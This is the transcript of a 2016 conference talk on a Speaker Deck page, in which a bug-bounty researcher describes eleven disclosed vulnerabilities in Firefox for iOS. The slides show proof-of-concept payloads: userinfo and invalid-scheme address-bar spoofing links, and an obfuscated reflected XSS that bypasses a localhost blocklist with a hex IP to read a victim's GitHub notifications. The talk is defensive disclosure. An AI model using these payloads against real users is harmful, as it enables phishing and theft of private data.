Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Finding Vulnerabilities in Firefox for iOS

9b5fecf0cfbd6572bd753a795b7e4b07?s=47 MUNEAKI NISHIMURA
October 27, 2016
Technology
2
7.3k

Finding Vulnerabilities in Firefox for iOS

Presented at PacSec 2016

9b5fecf0cfbd6572bd753a795b7e4b07?s=128

MUNEAKI NISHIMURA

October 27, 2016
Tweet

More Decks by MUNEAKI NISHIMURA

See All by MUNEAKI NISHIMURA
ブラウザの脆弱性とそのインパクト
9b5fecf0cfbd6572bd753a795b7e4b07?s=48 nishimunea
26
9k
脆弱性発見者が注目する近年のWeb技術
9b5fecf0cfbd6572bd753a795b7e4b07?s=48 nishimunea
29
12k
脆弱性発見者の目から見た、脆弱性対応の最前線
9b5fecf0cfbd6572bd753a795b7e4b07?s=48 nishimunea
15
2.5k
Slack Team for Security Testers and Bug Hunters
9b5fecf0cfbd6572bd753a795b7e4b07?s=48 nishimunea
1
670
SWIFT Code for Mozilla Bank
9b5fecf0cfbd6572bd753a795b7e4b07?s=48 nishimunea
1
780
次世代プラットフォームのセキュリティモデル考察
9b5fecf0cfbd6572bd753a795b7e4b07?s=48 nishimunea
6
4.4k

Other Decks in Technology

See All in Technology
サイボウズの アジャイル・クオリティ / Agile Quality at Cybozu
A97eee01397705443a72a48ce29d3e19?s=48 cybozuinsideout
PRO
4
1.7k
Custom AppをIP制限ありのままで審査に通す方法
Df8bc8c531e2c5c89c1a007db1cf79a3?s=48 yusuga
0
280
WACATE 2022 夏 ワークショップの目的
Add1036688abcb2e3dbff7c3090f7e35?s=48 imtnd
0
110
雑な攻撃からELBを守る一工夫 +おまけ / Know-how to protect servers from miscellaneous attacks
8e8410eb785755ae2cb485f85dbab6e8?s=48 hiroga
0
210
出張スクラムマスターとしての FEARLESS CHANGE な生き方
07c1e95591450e742911f01a9b12f256?s=48 naitosatoshi
1
1.2k
視座とアジャイル / shiza_and_agile
Dd672f13e7e17714700544cb355cbaba?s=48 kyoshimoto
0
180
1人目QA奮闘記/QA Engineer's Struggle
253f81535853f9fddcadaec9b37dc1e0?s=48 mii3king
2
1k
組織の崩壊と再生、その中で何を考え、感じたのか。 そして本当に必要だったもの
962920d4608365b332d0c65f9b3e7ba5?s=48 kosako
0
950
Target SDK Versionを上げない Notification runtime permission対応
0c5e92294cc0cfba620641c589db9378?s=48 napplecomputer
0
110
音のような言葉 〜ちゃちゃっとチャットで楽しむちょっとしたコツ〜 / words like sounds
8db3c91c8b3d3e5686f62fbf43c303dd?s=48 satoryu
1
1.3k
ROS再入門​-はじめてのSLAM-
4b2f3a64637b51e81813accbe8a98083?s=48 miura55
0
370
UWBを使ってみた
8b0e9a3684bd29ecece29db2582e38ae?s=48 norioikedo
0
370

Featured

See All Featured
How STYLIGHT went responsive
F716e5f737fcfb03f2cf8d1a184f1dbe?s=48 nonsquared
85
3.9k
CoffeeScript is Beautiful & I Never Want to Write Plain JavaScript Again
5b9fe87ec1faa67a4599782930f45ec9?s=48 sstephenson
151
13k
Easily Structure & Communicate Ideas using Wireframe
0c6fd6a08d0f898159cda7cafcacf07f?s=48 afnizarnur
181
15k
WebSockets: Embracing the real-time Web
E76911cbe088e5b850d966de3fc7435b?s=48 robhawkes
57
5.1k
Building Your Own Lightsaber
Fe6b81005d1553accd6b2a28f6a2bef1?s=48 phodgson
94
4.6k
Why You Should Never Use an ORM
88bc30284c6a424b63a92aad27d0ba36?s=48 jnunemaker
PRO
47
7k
BBQ
761be20b5ebd271008bcee1244fc5b52?s=48 matthewcrist
74
7.9k
Building an army of robots
5f2da528927a2ec9ba4fec2069cbc958?s=48 kneath
299
40k
How GitHub (no longer) Works
78b475797a14c84799063c7cd073962f?s=48 holman
296
140k
Mobile First: as difficult as doing things right
0fe2973fa8d27d96547e43322341183a?s=48 swwweet
213
7.5k
The Invisible Customer
4262b9cfacfb6b2c77f23e1d0310cd3e?s=48 myddelton
110
11k
What’s in a name? Adding method to the madness
C0390e8b11079f8761c0cd3274ed61cb?s=48 productmarketing
11
1.6k

Transcript

  1. Finding Vulnerabilities in Firefox for iOS 2016.10.27 at PacSec 2016

  2. Senior security engineer at Recruit Technologies Co., Ltd. Application track

    leader at Security Camp 2016 Weekend bug hunter MUNEAKI NISHIMURA - nishimunea

  3. Firefox for iOS

  4. None

  5. Apple’s WKWebView for rendering web contents

  6. User interface written in Swift by Mozilla

  7. In Scope of Mozilla Bug Bounty Program but security bugs

    in WKWebView are ineligible

  8. I Found 11 Bugs & Received $22,000 Bug 1224529 Bug

    1267019 Bug 1290732 Bug 1224906 Bug 1278053 Bug 1290760 Bug 1224910 Bug 1279787 Bug 1293931 Bug 1258188 Bug 1290714

  9. • Source code of Firefox for iOS is on GitHub

    https://github.com/mozilla/firefox-ios • I discovered almost all the bugs using keyword searches in the source code (during commute)

  10. Address bar spoofing

  11. • WKWebView’s URL property returns current page URL • However,

    if an application displays the URL in its address bar without any care, URL spoofing is allowed

  12. Address bar spoofing with userinfo field in front of hostname

    Bug 1224906

  13. The userinfo field in URL had been used for URL

    spoofing attacks around 2004 <a href="https://login.microsoftonline.com@ evil.csrf.jp">Microsoft?</a> Userinfo

  14. • Internet Explorer was the first to strip userinfo from

    its address bar • Safari displays phishing site warning screen before loading the link

  15. • WKWebView doesn’t strip userinfo from URL property • Each

    application has to take care of it when displaying URL • However, Firefox for iOS directly used URL property

  16. Classical URL spoofing again Mozilla already fixed but some iOS

    browsers still have this issue

  17. Address bar spoofing with invalid URL scheme Bug 1224910

  18. • There is a time gap between URL property update

    and WKWebView’s state update • This gap sometimes causes a security problem

  19. Current URL Next URL Current Page Next Page URL property

    WKWebView’s state Page loading has finished Page navigation has started

  20. Current URL Next URL Current Page Next Page URL property

    WKWebView’s state Time Gap

  21. Page loading with an invalid URL scheme can abuse the

    time gap <a href="nttps://www.google.com">Google?</a> Invalid scheme

  22. Current URL Invalid URL Current Origin URL property WKWebView’s state

    Never finish loading URL is replaced

  23. w = window.open('nttps://accounts.google.com'); setTimeout(function(){ w.document.body.innerHTML='<h1>Hacked.</h1>'; }, 1000); Following code can

    spoof address bar by injecting DOM contents into a new window while loading an invalid URL
  24. None

  25. w = window.open('http://account.google.com'); setTimeout(function(){ w.document.body.innerHTML='<h1>Hacked.</h1>'; }, 1000); Similar bug on

    Safari for iOS before 9.3.3 that could be abused with a non-existing hostname
  26. None

  27. Origin confusion in Script Messages

  28. WKWebView Script Messages Do something Script Messages A feature of

    WKWebView to invoke registered Swift handlers from JavaScript

  29. https://github.com/mozilla/firefox-ios/blob/Firefox-v5.2b1/Client/Assets/PrintHelper.js window.print = function() { webkit.messageHandlers.printHandler.postMessage({}) }; Example JS’s window.print

    function of Firefox for iOS uses Script Messages as follows

  30. https://github.com/mozilla/firefox-ios/blob/Firefox-v5.2b1/Client/Assets/PrintHelper.js window.print = function() { webkit.messageHandlers.printHandler.postMessage({}) }; Invoke printing function

    in Swift Example JS’s window.print function of Firefox for iOS uses Script Messages as follows

  31. https://github.com/mozilla/firefox-ios/blob/Firefox-v5.2b1/Client/Assets/PrintHelper.js window.print = function() { webkit.messageHandlers.printHandler.postMessage({}) }; Similar handlers can

    be found by searching “messageHandlers” Example JS’s window.print function of Firefox for iOS uses Script Messages as follows
  32. None

  33. • All messageHandlers can be called from any origin •

    Most of them are good, e.g., printHandler • However, some of them need to restrict caller origin

  34. Login data can be stolen from any other site (discovered

    by Mozilla before its public release) Bug 1194567

  35. WKWebView 1. Inject JS code to find a form Username

    Password Login 2. Send back a form info 4. Inject JS code to fill out a form Password Manager in Firefox for iOS automatically finds and fills out a login form in a page by the following steps 3. Find stored credentials for the current URL

  36. WKWebView 1. Inject JS code to find a form Username

    Password Login 2. Send back a form info 4. Inject JS code to fill out a form WKWebView’s URL property was used here to find user credentials for the current URL 3. Find stored credentials for the current URL URL property was used as a retrieval key to get ID/PW of the current page

  37. Attacker URL Target URL Attacker Page Target Page URL property

    WKWebView’s state Time Gap Attacker can make Firefox to fill out target page’s ID/PW to the attacker‘s page by abusing time gap

  38. Accounts command handler can be called from any origin Bug

    1293931

  39. Accounts Command Handler is used in Firefox Sync sign in

    for communicating with WKWebView Handler is used here for registering user credentials to browser UI

  40. • The handler is available only in special WKWebView for

    sign in, there is no address bar and all resources are https: • However, the handler has no check for caller’s origin • Is it secure or not…?
  41. None
  42. None
  43. None
  44. None
  45. None
  46. None
  47. None

  48. http://creativecommons.org

  49. Yep, Attacker Can Inject Her Firefox Account if she can

    alter Creative Commons website in some way (e.g., MITM)

  50. Improper access control of local web server

  51. • Firefox for iOS runs a local web server while

    in foreground • Browser internal pages are published from the server, e.g., certificate warning page • Firefox associates browser features with URL path names by registerHandlerForMethod in WebServer class
  52. None

  53. Reader Mode Make a page layout more reader-friendly

  54. http://localhost:6571/reader-mode/page? url=https://blog.mozilla.org/security • Readerized contents are published from the local

    server • Address bar displays original URL but the real URL is below Original URL is in a query string

  55. Address bar spoofing in Reader Mode with userinfo in front

    of hostname Bug 1293068

  56. Reader Mode directly displayed URL in a query then, userinfo

    in a part of URL was not stripped http://localhost:6571/reader-mode/page? url=https://blog.mozilla.org/security URL in a query was directly used here

  57. Wow, I just saw that! URL spoofing attack with userinfo

    could work on Reader Mode <a href="http://localhost:6571/reader-mode/page? url=https://hacked.whitehouse.gov@developers. google.com/webmasters/hacked/">Whitehouse?</a> Userinfo
  58. None

  59. Reader Mode leaks sensitive HTTPS URLs through HTTP referer Bug

    1290732

  60. • GitHub’s Gists supports secret mode • Not private, discoverable

    if the URL is known • Gists uses Referrer-Policy in a meta tag to prevent unintentional URL leakage

  61. • Reader mode strips all meta tags and a page

    is sent through http: channel • Finally, Gist’s secret URLs are leaked via HTTP Referer http://localhost:6571/reader-mode/page? url=https://gist.github.com/nishimunea/ 899da90df5b169a80df39e73fec89e87 Secret Gist URL

  62. Steal cross origin DOM data with bypassing localhost navigation blocking

    Bug 1279787

  63. • Readerized pages are in the same localhost origin regardless

    of its real origin • If there were XSS on the local server, arbitrary page data could be stolen from Reader Mode URL • The question is where is XSS on localhost

  64. XSS Was Also in a Reader Mode URL http://localhost:6571/reader-mode/page?url=javascript:alert(1) XSS

    was here

  65. public var isLocal: Bool { return host?.lowercaseString == "localhost" ||

    host == "127.0.0.1" || host == "::1" } private extension WKNavigationAction { private var isAllowed: Bool { return !(request.URL?.isLocal ?? false) Localhost Navigation Has Been Blocked Since 4.0 so XSS on Reader Mode has not been exploitable directly from a web page Blocked if host is “localhost”, 127.0.0.1, or ::1 https://github.com/mozilla-mobile/firefox-ios/commit/78df359fd64aa7fc98bb2e1e7f65863c434fd3bb

  66. Hostname Blacklisting Was Insufficient still exploitable the XSS through http://0x7f000001:6571/

  67. <a href="http://0x7f000001:6571/reader-mode/page?url= javascript:document.body.innerHTML=String.fromCharCode( 60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,1 16,112,58,47,47,48,120,55,102,48,48,48,48,48,49,58,54,5 3,55,49,47,114,101,97,100,101,114,45,109,111,100,101,47 ,112,97,103,101,63,117,114,108,61,104,116,116,112,115,5 8,47,47,103,105,116,104,117,98,46,99,111,109,47,110,111 ,116,105,102,105,99,97,116,105,111,110,115,34,32,111,11 0,108,111,97,100,61,34,97,108,101,114,116,40,116,104,10

    5,115,46,99,111,110,116,101,110,116,68,111,99,117,109,1 01,110,116,46,98,111,100,121,46,105,110,110,101,114,72, 84,77,76,41,34,62,60,47,105,102,114,97,109,101,62);"> Finally, following XSS payload worked for stealing victim’s private notifications on GitHub

  68. <a href="http://0x7f000001:6571/reader-mode/page?url= javascript:document.body.innerHTML=String.fromCharCode( 60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,1 16,112,58,47,47,48,120,55,102,48,48,48,48,48,49,58,54,5 3,55,49,47,114,101,97,100,101,114,45,109,111,100,101,47 ,112,97,103,101,63,117,114,108,61,104,116,116,112,115,5 8,47,47,103,105,116,104,117,98,46,99,111,109,47,110,111 ,116,105,102,105,99,97,116,105,111,110,115,34,32,111,11 0,108,111,97,100,61,34,97,108,101,114,116,40,116,104,10

    5,115,46,99,111,110,116,101,110,116,68,111,99,117,109,1 01,110,116,46,98,111,100,121,46,105,110,110,101,114,72, 84,77,76,41,34,62,60,47,105,102,114,97,109,101,62);"> Finally, following reflected XSS payload works for stealing victim’s private notifications on GitHub <iframe src="http://0x7f000001:6571/reader-mode/ page?url=https://github.com/notifications" onload="alert(this.contentDocument.body. innerHTML)"></iframe>

  69. XSS is triggered from here

  70. Load target readerized page (github.com/notifications) in an iframe

  71. Steal the DOM contents from the parent window

  72. Lessons learned from flaws in Firefox for iOS

  73. • Use WKWebView’s URL property with special care • Consider

    to apply access controls for Script Messages • Avoid hosting sensitive data on localhost web server

  74. Thanks